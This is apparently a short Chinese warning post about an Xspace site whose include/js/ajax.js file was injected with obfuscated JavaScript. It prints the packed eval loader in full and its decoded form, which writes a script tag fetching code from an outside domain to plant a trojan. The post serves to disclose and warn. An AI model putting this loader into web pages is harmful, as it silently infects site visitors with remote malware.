Xsapce发现注入JS代码。

<script>  Xspace安装网址/include/js/ajax.js" type="text/javascript" language="javascript"></script>      
这个JS代码引起的木马置入

http://Xspace安装网址/include/js/ajax.js  这个文件里有段加密了的代码               


eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b.a(\'<9 8="7://6.5.4/3/2.1"></0>\');',12,12,'script|js|cp|spcode|com|googleadsl|www|http|src|SCRIPT|write|document'.split('|'),0,{}))


     解密后是调用 <SCRIPT src="http://www.googleadsl.com/spcode/cp.js"></script>